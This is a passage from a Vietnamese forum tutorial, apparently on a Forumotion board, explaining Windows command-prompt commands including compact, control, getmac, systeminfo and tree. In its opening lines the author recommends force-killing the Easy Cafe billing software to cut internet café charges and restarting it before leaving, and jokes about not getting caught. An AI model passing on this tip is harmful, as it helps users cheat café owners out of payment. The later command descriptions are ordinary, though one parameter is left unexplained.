tham số /f là để tắt ứng dụng đó đi một cách hoàn toàn! Gọi là tắt hoàn toàn vậy thui chứ minh run hoặc khởi động lại là nó vẫn chạy bình thường ah! Lợi dụng ứng dụng này ta có thể làm giảm bớt chi phí ngồi net bằng cách tắt easy cafe đi. Chừng nào gần về rùi hãy mở lại hoặc nhấn nút reset là xong! He he! Nhưng nhớ phải làm cho khéo kẻo bị đập đó!

26. Lệnh Compact:

Compact [/c] [/u] [/s] [/a] [/i] [/f] [/q]

- tham số /c : chỉ định nén một file nào đó
- tham số /u : giải nén một file nào đó
- Các tham số còn lại tự ngâm cứu thêm nhé!

Công dụng: Tương tự như chức năng tiết kệm dung lượng đĩa trên Windows XP hay 2003 (Vista) - chỉ có khi dùng NTFS là "Compress Contents To Save Disk Space". Các bạn có nhiều kiểu làm như click phải chuột vào một file chọn Properties -> Advanced rồi check vào ô tiết kiệm dung lượng cho file này "Compress file to save disk space". Nhưng khi các bánj muốn nén tất các file có phần mở rộng là *.* thì Compact là lựa chọn tốt nhất. Ví dụ:

compact /c *.exe

27. Lệnh control:

control

Công dụng: Mở control panel bằng CMD

28. Lệnh getmac:

getmac

Công dụng: lấy thông tin địa chỉ MAC (Media Access Control) từ card mạng.

29. Lệnh systeminfo:

systeminfo

Công dụng: hiển thị thông tin của hệ thống từ cấu hình cơ bản, loại CPU, khu vực địa lý, các bản hotfix (bản cập nhập) đã cài trong máy, v.v...

30. Lệnh tree:

tree [ổ đĩa]:[đường dẫn] [/f] [/a]

- Tham số /f : hiển thị tên của file trong mỗi thư mục
- Tham số /a : không rõ

Công dụng: Hiển thị cấu trúc thư mục dạng cây!

      
      

Xem chủ đề cũ hơn Xem chủ đề mới hơn Về Đầu Trang  Thông điệp [Trang 1 trong tổng số 1 trang]

Quyền hạn của bạn

Bạn không có quyền trả lời bài viết
free counters



  • Đoàn Ngọc Khánh

    mobile phone 098 376 5575


    Đỗ Quang Thảo

    mobile phone 090 301 9666


    Nguyễn Văn Của

    mobile phone 090 372 1401


    IP address signature
    Create a forum on Forumotion | ©phpBB | Free forum support | Báo cáo lạm dụng | Thảo luận mới nhất